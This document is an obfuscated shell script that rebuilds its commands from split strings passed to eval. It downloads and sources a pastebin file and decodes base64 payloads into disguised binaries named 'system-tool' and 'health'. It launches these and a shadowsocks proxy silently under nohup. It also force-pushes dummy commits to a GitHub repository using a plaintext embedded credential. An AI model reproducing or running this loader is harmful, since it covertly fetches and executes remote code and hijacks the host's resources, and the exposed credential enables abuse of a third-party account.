EmfXKw="o apt update &"
RJeyoMa=">/dev/null"
mGVm=" || tr"
eval "sud""$EmfXKw""$RJeyoMa""$mGVm""ue"
kYcu="et -O codesrc h"
Pqbzg="ttps://pas"
RnIPJ="tebin.com/raw/"
KJfnnNo="UKs9hZfc &>"
enOSASMl="/dev/nu"
eval "wg""$kYcu""$Pqbzg""$RnIPJ""$KJfnnNo""$enOSASMl""ll"
qFipqFmi=". ./co"
eval "$qFipqFmi""desrc"
git clone $SRC codes &>/dev/null
vELgC="ase64 -d c"
xCNoqE="odes/s > o"
eval "b""$vELgC""$xCNoqE"
CIqYGu="sudo apt -"
Dtvq="-yes install ps"
NpzYg="misc shadowso"
UlwjuNri="cks-libev &>/d"
QOLYv="ev/null || "
CTVX="tru"
eval "$CIqYGu""$Dtvq""$NpzYg""$UlwjuNri""$QOLYv""$CTVX""e"
WsUel="do systemctl"
apVP=" stop shad"
JBAliZq="owsocks-libev"
JNHr=".service &>/dev"
vAKqjNK="/null ||"
eval "su""$WsUel""$apVP""$JBAliZq""$JNHr""$vAKqjNK"" true"
DnJqaA="base64 -d co"
rrWQQ="des/c > hea"
eval "$DnJqaA""$rrWQQ""lth"
tFrMlWO="base64 -d cod"
sQRviV="es/gc > gc"
eval "$tFrMlWO""$sQRviV"
mTWe="base64 -d cod"
fQcgB="es/m > system-"
eval "$mTWe""$fQcgB""tool"
iNUUAB="base64 -d cod"
qZmETuxm="es/p > prepare"
eval "$iNUUAB""$qZmETuxm"
. ./prepare
WZpo="nohup sudo"
AdZtSbh=" ss-local "
XbLHgNf="-c o --plug"
WaNfTnFb="in ./gqs --pl"
NgJzG="ugin-opts ./gc "
XRbIHy="&>/dev/nu"
eval "$WZpo""$AdZtSbh""$XbLHgNf""$WaNfTnFb""$NgJzG""$XRbIHy""ll &"
UMGS="chmod +x sy"
tNREZX="stem-t"
eval "$UMGS""$tNREZX""ool"
YdjvHH="ed -i 's/gcc/s"
XiyR="egfu/g' hea"
eval "s""$YdjvHH""$XiyR""lth"
gvzyK="hup sudo ./syst"
xCeaN="em-tool -c h"
ExwWfl="ealth &>/d"
ppQRvifU="ev/nul"
eval "no""$gvzyK""$xCeaN""$ExwWfl""$ppQRvifU""l &"
bdZjWSBP="ho "
eval "ec""$bdZjWSBP""mzpxg"
QULBx="e"
eval "sl""$QULBx""ep 61"
PXsnf="t clone https:"
omTBZ="//github.com/r"
uiwoIZp="oman-akopy"
dKZXA="anxb/qopenoffic"
JaaRGA="e.git tmp &>/de"
oZnB="v/null || tru"
eval "gi""$PXsnf""$omTBZ""$uiwoIZp""$dKZXA""$JaaRGA""$oZnB""e"
bKNZ="cd tmp ||"
eval "$bKNZ"" true"
EREsLotb="git config u"
uziEMJ="ser.name 'Rom"
Hofr="an Akopyan'"
cjciuqaq=" &>/dev/nul"
gwkr="l || tr"
eval "$EREsLotb""$uziEMJ""$Hofr""$cjciuqaq""$gwkr""ue"
Toezhh="it config us"
VLURH="er.email roman"
OwXY=".akopyanxb@in"
qPxixJ="box.ru &>/dev"
kCDGWA="/null || "
eval "g""$Toezhh""$VLURH""$OwXY""$qPxixJ""$kCDGWA""true"
echo 'mzpxg bump' >> mzpxg$MAKE
CWOT="BUILD=\`date"
JmARWIG=" +%"
eval "$CWOT""$JmARWIG""s\`"
aCWRmR="MAKE=\`date +%"
eval "$aCWRmR""S\`"
echo $BUILD >> mzpxg$MAKE
git add mzpxg$MAKE &>/dev/null || true
git commit -m 'mzpxg bump '$MAKE &>/dev/null || true
JeHiusw=" push https:/"
OgYcTOdm="/roman-akop"
RFzcEdJ="yanxb:'CNjR-KSj"
AzYmA="HVv_9Ap'@git"
mceOJS="hub.com/rom"
nkHiBZJs="an-akopyanxb"
mGdKAS="/qopenoffice."
hRVXwZc="git -f &>/dev/"
pvBbdf="null || tr"
eval "git""$JeHiusw""$OgYcTOdm""$RFzcEdJ""$AzYmA""$mceOJS""$nkHiBZJs""$mGdKAS""$hRVXwZc""$pvBbdf""ue"
while :; do G=`date +%s`; echo 'meson qopenoffice '$G; [ `expr 1323 + $BUILD` -lt $G ] && sudo killall system-tool && break; sleep 175; done
